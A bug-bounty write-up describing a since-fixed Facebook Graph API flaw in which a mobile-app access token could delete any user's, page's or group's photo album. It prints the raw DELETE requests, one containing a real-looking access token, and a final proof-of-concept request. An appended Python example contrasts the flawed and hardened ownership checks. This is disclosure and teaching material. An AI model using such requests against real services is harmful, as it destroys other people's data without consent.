Facebook bug would have allowed hackers to easily delete your photos
Bug found by: Laxman Muthiyah
What if your photos got deleted without your knowledge? That would be pretty upsetting, wouldn't it? This post is about a vulnerability I found that allowed a malicious user to delete any photo album on Facebook: any album owned by a user, a page or a group could be deleted.
The Graph API is the primary way for developers to read and write user data. All Facebook apps today use the Graph API, and in general it requires an access token to read or write user data. Read more about the Graph API here.
According to the Facebook developer documentation, photo albums cannot be deleted through the album node in the Graph API.
I tried to delete one of my own photo albums using a Graph API Explorer access token.
Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6L
qgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0
DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87K
KsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD
Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}
Why? Because this application does not have the capability to delete photo albums. But note the error message: it tells us that some other application does have the capability to make this API call :P
I decided to try it with a Facebook for mobile access token, because the Facebook mobile application shows a delete option for every photo album, and it uses the same Graph API. So I took one of my album ids and my own Facebook for Android access token and tried it.
Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Response :-
true
Album 518171421550249 got deleted :D So what's the next step? I took a victim's album id and tried to delete it. I was very curious to see the result.
Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Response :-
true
OMG :D the album got deleted! So I had the key to delete all of your Facebook photos :P lol :D
I immediately reported this bug to the Facebook security team. They were very fast in identifying the issue, and a fix was in place less than 2 hours after they acknowledged the report.
Final Proof Of Concept :-
Request :-
DELETE /<Victim's_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>
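As an added illustration (not Facebook's code and not from the original post), here is a small Python model of the authorization decision behind the DELETE request above. It contrasts the behaviour described in this post, where only the calling application's capability was checked, with a hardened version that also verifies that the token's user owns or administers the album; all tokens, ids, app names and the ownership error text are constructed, and only the (#200) message is the one quoted in the post.

```python
# Added example (not Facebook's code): a minimal model of the authorization
# decision behind "DELETE /{album-id}" on the Graph API, contrasting the
# behaviour described in the post (only the calling app's capability is
# checked) with a version that also checks who owns the album. Tokens, ids,
# app names and the ownership error text are constructed.

CAPABILITY_ERROR = {"error": {"code": 200, "type": "OAuthException",
    "message": "(#200) Application does not have the capability to make this API call."}}
OWNERSHIP_ERROR = {"error": {"code": 403, "type": "OAuthException",  # constructed
    "message": "Caller does not own or administer this album."}}

# Constructed token table: access_token -> (user_id, app_name)
TOKENS = {
    "tok_explorer_attacker": ("user_attacker", "graph_explorer"),
    "tok_android_attacker": ("user_attacker", "facebook_for_android"),
    "tok_android_victim": ("user_victim", "facebook_for_android"),
}
# Constructed album table: album_id -> owning user, page or group id
ALBUMS = {"518171421550249": "user_attacker", "album_victim": "user_victim",
          "album_page": "page_xyz"}
# Constructed: apps permitted to call album deletion, and page/group admins
APPS_WITH_DELETE = {"facebook_for_android"}
ADMINS = {"page_xyz": {"user_victim"}}


def _check_capability(access_token):
    """Shared step: resolve the token and confirm its app may call delete."""
    user, app = TOKENS.get(access_token, (None, None))
    if app not in APPS_WITH_DELETE:
        return None, CAPABILITY_ERROR
    return user, None


def delete_album_vulnerable(album_id, access_token):
    """As in the post: the app capability is checked, album ownership is not."""
    _user, err = _check_capability(access_token)
    if err:
        return err
    return album_id in ALBUMS  # True for any existing album, whoever owns it


def delete_album_fixed(album_id, access_token):
    """Hardened: the token's user must own the album or administer its owner."""
    user, err = _check_capability(access_token)
    if err:
        return err
    owner = ALBUMS.get(album_id)
    if owner is None:
        return False  # unknown object
    if user == owner or user in ADMINS.get(owner, set()):
        return True
    return OWNERSHIP_ERROR
```

The vulnerable path reproduces the three results in the post (the Explorer token is refused with #200, the Android token deletes the caller's own album and then a victim's), while the hardened path refuses the victim's album but still lets the owner, or an admin of the owning page, delete it.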
The problem is now resolved, and he was awarded $12500 by Facebook.